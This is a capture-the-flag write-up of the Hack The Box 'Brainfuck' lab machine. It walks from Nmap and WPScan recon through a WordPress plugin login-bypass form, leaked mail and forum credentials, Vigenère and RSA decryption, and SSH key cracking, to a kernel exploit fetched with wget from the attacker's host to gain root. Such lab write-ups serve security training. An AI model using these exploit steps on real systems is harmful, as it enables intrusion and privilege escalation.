Hack The Box: Brainfuck Write-up (#6)
Let’s begin with recon.
Reconnaissance
Start with a basic Nmap scan.
nmap -sC -sV -O -oA nmap/basic 10.10.10.17
- -sC: Default Nmap script
- -sV: Service/version info
- -O: Enable OS detection
- -oA: Output scan results in 3 different formats
We get back the following results:
- Port 22: OpenSSH 7.2p2 Ubuntu 4ubuntu2.1
- Port 25: Postfix smtpd
- Port 110: Dovecot pop3d
- Port 143: Dovecot imapd
- Port 443: Nginx 1.10.0 (Ubuntu)
Next, run a full Nmap scan.
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.17
- -p-: Scan all ports from 1–65535
The result I get back is the same as for the basic Nmap scan: no other ports are open. Similarly, run a UDP scan.
nmap -sU -O -p- -oA nmap/udp 10.10.10.17
- -sU: UDP Scan
We get back the following results: no other ports are open.
A quick summary before we begin with service enumeration.
- The SSH version is not vulnerable on Ubuntu 16.04 LTS (Xenial Xerus). Even if we find published vulnerabilities for OpenSSH 7.2p2, the exploits probably will not work against this Ubuntu package, because it has been patched. Refer here.
- Port 443 is running HTTPS. We need to check the SSL certificate for information, and we also need to add the DNS hostnames (found during the Nmap scan) to our /etc/hosts file to map them to this host's IP. Otherwise, we can't reach the web pages.
- Ports 25, 110 and 143 are mail protocols. Normally we need credentials to access a mail service.
Service Enumeration
Port 443 (HTTPS web service)
Append the following entries to /etc/hosts and save it.
10.10.10.17 sup3rs3cr3t.brainfuck.htb
10.10.10.17 www.brainfuck.htb brainfuck.htb
Next, we browse to https://brainfuck.htb.
This web server hosts a WordPress web application. Let's enumerate it with WPScan.
WordPress Web Application Enumeration
wpscan --url https://brainfuck.htb/ --disable-tls-checks -e ap at vp cb
We get back the following results:
Searching for an exploit with the keywords “wordpress plus responsive” gives the following results:
root@kali:~# searchsploit wordpress plus responsive
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vul | php/webapps/34589.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Inject | php/webapps/40939.txt
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Exploit number 2 (php/webapps/41006.txt) seems promising. Reading through it reveals that it lets us log in as any given username without knowing the password.
...SNIP...
1. Description
You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html
2. Proof of Concept
<form method="post" action="http://wp/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
WordPress Web Application Exploitation
We need to make a small modification to the exploit code: the URL in the form's action attribute must point at the target's admin-ajax.php, as below.
root@kali:/htb/Brainfuck# cat poc.html
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Save the file in the current directory; I named it poc.html. Next, start a Python simple web server in the same directory and open that directory in the browser on Kali.
root@kali:/htb/Brainfuck# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Click the file, enter admin in the username field and click Login.
Leave this tab open. Open a new tab and visit https://brainfuck.htb; refresh the page and you will see that you are logged in as admin.
WordPress Web Application Post-Enumeration
Go to the admin dashboard, click Settings and then Easy WP SMTP.
Here we find a credential for the user orestis, with the password masked. We can view the plaintext password by right-clicking the password field and choosing Inspect Element, as below.
We can use this credential to access the mailbox of the user orestis.
Port 110 (POP3 service)
Let's connect to this service with Netcat and enter the discovered orestis credential.
root@kali:/htb/Brainfuck# nc 10.10.10.17 110
+OK Dovecot ready.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
List the inbox messages. In message 2 we find another set of credentials for the user orestis, for a forum called “secret”.
root@kali:/htb/Brainfuck# nc 10.10.10.17 110
+OK Dovecot ready.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
LIST
+OK 2 messages:
1 977
2 514
.
RETR 2
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards
Port 443 (targeting sup3rs3cr3t.brainfuck.htb)
We already know that another hostname exists for this host, and its name reads like “secret”. Let's browse to https://sup3rs3cr3t.brainfuck.htb.
Click login and enter the new set of credentials.
After enumerating this forum, I found that password-based SSH access to this server is permanently disabled, but we can authenticate with an SSH key.
I also noticed a few things, as marked in the picture above. Every time the user Orestis posts a comment, his signature is always the same: “Orestis - Hacking for fun and profit”. Orestis also asked the admin to share the SSH key in an encrypted chat. If you go to the “Key” page you will see the page below with the encrypted text.
After a little observation, two things stand out in the encrypted chat. The signature of orestis has the same length in the encrypted posts, so it serves as known plaintext. Also, the URL must start with the https protocol and end with id_rsa, because this is about an SSH key.
Orestis - Hacking for fun and profit << Plaintext
Pieagnm - Jkoijeg nbw zwx mle grwsnn << cipher text
Wejmvse - Fbtkqal zqb rso rnl cwihsf << cipher text
Qbqquzs - Pnhekxs dpi fca fhf zdmgzt << cipher text
mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr << cipher text
https://10.10.10.17/......................................../id_rsa << known plaintext
Now we need to find the correct cipher. Using the online one-time-pad tool at http://rumkin.com/tools/cipher/otp.php, I pasted the ciphertext above into the message textbox and the plaintext into the pad textbox, and received the key text “BrainfuCkmybrainfuckmybrainfu”.
The key text repeats; re-arranged, it is actually “fuckmybrain”. To decipher the URL, I found that the Vigenère cipher is the correct method. Here is the deciphered URL:
https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
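As an added example (not part of the original write-up), the following Python code reproduces the reasoning above offline: it derives the key stream from the known signature, finds its repeating period, and tries each rotation of that period on the URL until the plaintext starts with https. The three input strings are taken from the chat above.

```python
"""Known-plaintext recovery of the forum's Vigenere key and decryption of the URL."""
from string import ascii_lowercase as ALPHA

# Inputs taken from the encrypted chat on the forum's "Key" page.
PLAIN_SIG = "Orestis - Hacking for fun and profit"
CIPHER_SIG = "Pieagnm - Jkoijeg nbw zwx mle grwsnn"
CIPHER_URL = "mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr"

def keystream(plain, cipher):
    """Key letter = cipher letter - plain letter (mod 26); non-letters are skipped."""
    return "".join(ALPHA[(ord(c.lower()) - ord(p.lower())) % 26]
                   for p, c in zip(plain, cipher) if p.isalpha() and c.isalpha())

def shortest_period(ks):
    """Smallest prefix of ks that reproduces all of ks when repeated."""
    for n in range(1, len(ks) + 1):
        if all(ks[i] == ks[i % n] for i in range(len(ks))):
            return ks[:n]
    return ks

def vigenere_decrypt(text, key):
    """Classic Vigenere: key advances only on letters; case, digits and punctuation are kept."""
    out, i = [], 0
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            k = ALPHA.index(key[i % len(key)])
            out.append(chr((ord(ch) - base - k) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)

def recover_url(plain_sig, cipher_sig, cipher_url, prefix="https"):
    """The signature and the URL were enciphered at different key offsets, so try
    every rotation of the recovered period and keep the one that yields the prefix."""
    period = shortest_period(keystream(plain_sig, cipher_sig))
    for r in range(len(period)):
        key = period[r:] + period[:r]
        url = vigenere_decrypt(cipher_url, key)
        if url.startswith(prefix):
            return key, url
    raise ValueError("no rotation of the key produced the expected prefix")

if __name__ == "__main__":
    print(recover_url(PLAIN_SIG, CIPHER_SIG, CIPHER_URL))
```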
Accessing the URL prompts us to save the private RSA key file.
Let's save the key file. Looking at its content, the key is encrypted (“Proc-Type: 4,ENCRYPTED”).
root@kali:/htb/Brainfuck# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6904FEF19397786F75BE2D7762AE7382

...SNIP...
-----END RSA PRIVATE KEY-----
We can crack the passphrase of this RSA private key with John the Ripper, or simply john. First, we convert the encrypted key file into john's format with the ssh2john tool and save the output to a file; I named it id_rsa.txt.
root@kali:/htb/Brainfuck# python /usr/share/john/ssh2john.py id_rsa > id_rsa.txt
root@kali:/htb/Brainfuck# cat id_rsa.txt
id_rsa:$sshng$1$16$6904FEF19397786F75BE2D7762AE7382$1200$...SNIP...
Let's crack the passphrase with john.
root@kali:/htb/Brainfuck# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt
We got the passphrase! Now we have both the RSA key file (id_rsa, not id_rsa.txt) and its passphrase. One last thing before we access the target via SSH: change the permissions of the id_rsa key file to 600, otherwise ssh will refuse to use a key that is readable by others.
root@kali:/htb/Brainfuck# chmod 600 id_rsa
Exploitation or Just Login
Let's access the target now.
root@kali:/htb/Brainfuck# ssh -i id_rsa orestis@10.10.10.17
When prompted for a passphrase, enter “3poulakia!”.
Great, we have access to the target system. Let's read the content of the user.txt file.
Now we proceed with post-exploitation enumeration to escalate our privileges to root.
Post-Exploitation Enumeration
After checking the contents of the files in orestis's home directory, one particular file stands out because it explains what it does:
orestis@brainfuck:~$ cat encrypt.sage
nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)

c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
This script generates two random primes p and q, computes n and phi, picks a random e coprime to phi, RSA-encrypts the content of /root/root.txt and writes the ciphertext to output.txt. Crucially, it also writes p, q and e to debug.txt: anyone who can read that file can compute the private exponent and decrypt the flag.
orestis@brainfuck:~$ cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
A Google search for “decrypt RSA p q e” gave me this GitHub link. The parameters are the same as in encrypt.sage, but the script prefixes them with 0x. We do not have to do that; I tried it and the result was gibberish.
We copy the values of p, q and e from debug.txt into the code. The value of ct (the encrypted password) is found in output.txt. Put together, our updated code looks like this:
...SNIP...
p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182...SNIP...
Now let's run the code with Python.
We got the root.txt flag. Great!
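As an added example (neither the write-up's script nor the linked GitHub code), the Python below shows why leaking p, q and e in debug.txt is fatal: it mirrors encrypt.sage's encoding on a constructed small-prime instance and then recovers the plaintext from the factors. The primes, exponent and password are constructed for the demo and are not the box's real values.

```python
"""Recover an RSA-encrypted message when p, q and e are leaked (as in debug.txt)."""
from math import gcd

# Constructed demo parameters (small primes so the example runs instantly).
DEMO_P = 1000000007
DEMO_Q = 998244353
DEMO_E = 65537
DEMO_PASSWORD = b"s3cr3t!"  # constructed; stands in for the content of root.txt

def encrypt_like_sage(password, p, q, e):
    """Mirror encrypt.sage: m = int(hex(password), 16), c = m^e mod n."""
    n, phi = p * q, (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    m = int(password.hex(), 16)  # same as int(password.encode('hex'), 16) in Python 2
    if m >= n:
        raise ValueError("message too large for this modulus")
    return pow(m, e, n)

def decrypt_with_factors(p, q, e, c):
    """With p and q known, d = e^-1 mod phi(n) is immediate and the
    ciphertext is recovered in two modular operations."""
    n, phi = p * q, (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    m = pow(c, d, n)
    # Undo the hex encoding: the plaintext byte length is ceil(bit_length / 8).
    return m.to_bytes((m.bit_length() + 7) // 8, "big")

def demo_roundtrip():
    """Encrypt the constructed password, then recover it from the 'debug' values only."""
    c = encrypt_like_sage(DEMO_PASSWORD, DEMO_P, DEMO_Q, DEMO_E)
    return decrypt_with_factors(DEMO_P, DEMO_Q, DEMO_E, c)

if __name__ == "__main__":
    print(demo_roundtrip().decode())  # prints s3cr3t!
```

With the real values, the same decrypt_with_factors call takes p, q and e from debug.txt and c from output.txt.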
Privilege Escalation
I gathered OS and kernel information during the enumeration phase.
orestis@brainfuck:/tmp$ uname -a
Linux brainfuck 4.4.0-75-generic #96-Ubuntu SMP Thu Apr 20 09:56:33 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
orestis@brainfuck:/tmp$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
For privilege escalation, I used an awesome tool called linux-exploit-suggester-2, recommended by Tib3rius, to search for kernel exploits. After running the script, I got the following result.
root@kali:/opt/linux-exploit-suggester-2# ./linux-exploit-suggester-2.pl -k 4.4.0
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 4.4.0
Searching 72 exploits...
Possible Exploits
[1] af_packet
CVE-2016-8655
Source: http://www.exploit-db.com/exploits/40871
[2] dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[3] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[4] get_rekt
CVE-2017-16695
Source: http://www.exploit-db.com/exploits/45010
After reading through the code of all the exploits, number [4] worked for me. The code is fairly straightforward.
...SNIP...
Tested on Ubuntu 16.04 with the following Kernels
4.4.0-31-generic
4.4.0-62-generic
4.4.0-81-generic
4.4.0-116-generic
4.8.0-58-generic
4.10.0.42-generic
4.13.0-21-generic
Tested on Fedora 27
4.13.9-300
gcc cve-2017-16995.c -o cve-2017-16995
internet@client:~/cve-2017-16995$ ./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880038c3f500
[*] Leaking sock struct from ffff88003af5e180
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880038704600
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880038704600
[*] credentials patched, launching shell...
#id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)
...SNIP...
Download the exploit code with searchsploit on Kali using the command below.
root@kali:/htb/Brainfuck# searchsploit -m 45010
Rename the file to exploit.c and transfer it to the target using a Python simple web server; I downloaded it into the /tmp directory.
orestis@brainfuck:/tmp$ wget http://10.10.14.12/exploit.c
--2020-08-08 08:01:22-- http://10.10.14.12/exploit.c
Connecting to 10.10.14.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/plain]
Saving to: ‘exploit.c’
exploit.c 100%[=============================================================>] 13.41K 49.3KB/s in 0.3s
2020-08-08 08:01:22 (49.3 KB/s) - ‘exploit.c’ saved [13728/13728]
Now we compile the code with gcc, as instructed in the exploit's header.
orestis@brainfuck:/tmp$ gcc exploit.c -o exploit
orestis@brainfuck:/tmp$ ll
total 140
drwxrwxrwt 10 root root 4096 Aug 8 08:01 ./
drwxr-xr-x 23 root root 4096 Apr 29 2017 ../
-rwxrwxr-x 1 orestis orestis 18432 Aug 8 08:01 exploit*
The code compiled without any errors. Great! Let's execute the exploit.
orestis@brainfuck:/tmp$ ./exploit
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003ca28400
[*] Leaking sock struct from ffff88003ac2ec00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003bd4a780
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003bd4a780
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare),1000(orestis)
#
We rooted!
Attack Strategy Map
Thank you for reading :-) Next box is Cronos.